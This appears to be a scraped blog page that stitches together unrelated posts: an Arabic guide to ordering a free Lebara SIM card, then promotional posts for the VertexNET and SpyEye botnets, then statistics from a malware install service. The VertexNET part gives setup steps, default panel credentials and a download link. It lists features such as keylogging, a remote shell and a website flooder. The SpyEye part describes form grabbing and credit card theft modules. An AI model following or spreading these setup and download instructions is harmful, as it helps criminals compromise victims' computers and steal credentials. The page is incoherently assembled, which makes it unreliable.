كيفية الحصول على كارت سيم مجانا يمكنك تعبئتها من الأنترنيت مباشرة عن طريق Mastercard or Visa

تدوينتنا اليوم هي عبارة عن طريقة للحصول على Carte sim مجانا يمكنك تعبئتها من الأنترنيت مباشرة عن طريق Mastercard او Visa و أيضا يمكنك تعبئتها من محلات Lebara لو تواجدت في بلدك. أنا طلبت الكارت و وصلتني اليوم إلى المنزل عبر البريد فقط ب0$ هههه يعني مجانا. سأريكم صور تتبث صحة كلامي

 الآن كيفية الحصول على واحدة :
ادخل على الرابط التالي : https://www.lebara.fr/sim-gratuite
اضغط Passer l'annonce أو Skip ad
ثم املأ المعلومات التالية

اضغط Envoyer ma SIM و انتظر ما بين 15 يوم و 30 يوم، أنا وصلتني بعد 15 يوم بالضبط
أتمنى أن يعجبكم شرحي و السلام عليكم و رحمة الله تعالى و بركاته

[HTTP][BOTNET] VertexNET 1.2.1+Tutorial+Link Donwload

*Definition of Botnet VerTexNet
VertexNET is a http botnet coded in 2011 by DarkCoderSc creator of the DarkComet RAT. This is a botnet with great features and it is user friendly, easy to setup and use, and perfect for beginners starting for the first time with botnets.

VertexNet Feature List

> Message Box

> Execute Command (equivalent of "Run" on Windows)

> Terminate Loader Process

> File Downloader

> Get Process List

> Get Module List

> Keylogging

> Read remote files

> Complete Loader uninstall

> Built in file server with upload/download/execute 


> Website Flooder

> Remote shell

> Webpage visitor

> Loader updater

How to Setup:
Prereq: Make sure you have phpmyadmin and cpanel on whatever host you're using

1. Set up webhost (I'm assuming everyone knows how to do that)
2. Extract RAR
3. Go to >> /WebPanel/inc/connection.php and open in notepad
4. Where it says ["dbuser"] = "" and ["dbpass"] = "" add your database credentials between the quotes after = .
5. Log into phpMyAdmin and import database >> /WebPanel/SQL/vertexnet.sql
6. Upload /WebPanel files
7. Then in you're browser nav

8. Default User and Pass is root:toor
9. Open VNbuilder.exe > Accept the disclaimer
10. Goto Web Settings:
11. Goto Loader Settings:
>Leave Mutex alone
>Tick install loader to startup (unless you're using crypter that does that for you)
THe Explain For Install The Botnet Vertexnet
That's it! Enjoy.
LINK Donwload Botnet VerTexNet:http://goo.gl/vYV4at

BotNet Spyeye Explain + Link Downloads

The SpyEye toolkit is similar to Zeus in a lot of ways. It contains a builder module for creating the Trojan bot executable with config file and a Web control panel for command and control (C&C) of a bot net. Some of the advertised features online are:
•    Formgrabber (Keylogger)
•    Autofill credit card modules
•    Daily email backup
•    Encrypted config file
•    Ftp protocol grabber
•    Pop3 grabber
•    Http basic access authorization grabber
•    Zeus killer
New revisions of SpyEye, with additional features, are being released on a regular basis. The latest version (V1.0.7) contains an interesting new feature called “Kill Zeus” that we have yet to substantiate. SpyEye hooks the same Wininet API (Wininet.dll) HttpSendRequestA as used by Zeus for communications. If a compromised system infected with SpyEye was also infected with Zeus, this in turn would allow SpyEye to grab and report on http requests sent to the Zeus C&C server.

An example of Zeus C&C server report taken from underground forum

The new Kill Zeus feature is optional during the Trojan build process, but it supposedly goes as far as allowing you to delete Zeus from an infected system—meaning only SpyEye should remain running on the compromised system. If the use of SpyEye takes off, it could dent Zeus bot herds and lead to retaliation from the creators of the Zeus crimeware toolkit. This, in turn, could lead to another bot war such as we have seen in the past with Beagle, Netsky, and Mydoom.

An example of the SpyEye Trojan builder control panel

Another feature of SpyEye is the ability to load additional threats onto infected SpyEye systems, by country, using the SpyEye control panel GUI as shown below:
Tutorial Install Botnet Spyeye


Install service for Malware affiliates and individuals(BOTNET)

Install service for Malware affiliates and individuals

This install service was running since a long time but the server recently died.
People targeted are from Russia, Ukraine, Belarus, Kazakhstan, and Uzbekistan.
Statistics by days:

(Date, Unique visits, General visits)

Statistics by countries:

(Countries, Unique visits, Percentage, General visits)

Statistics by version:
(Version, Unique visits, Percentage, General visits)

Statistics by time:
(Time,  Users)


(Date, Already installed, ???? installed, Successfully installed, Copy failed, Modify failed, Register failed)


(Date, Begin update, Downloaded update, Executed update, No ATL, Execution failed)

Statistics by tasks:

(Date, Start of xxxx, Searches, Clicks, ???)

Statistics by sites:

Statistics by ads:

Loader, users list:
 (Nickname, ID, Priority, Ban, GEO, Days, General limit, Working conditions, Today, Summary, Size, Time, File)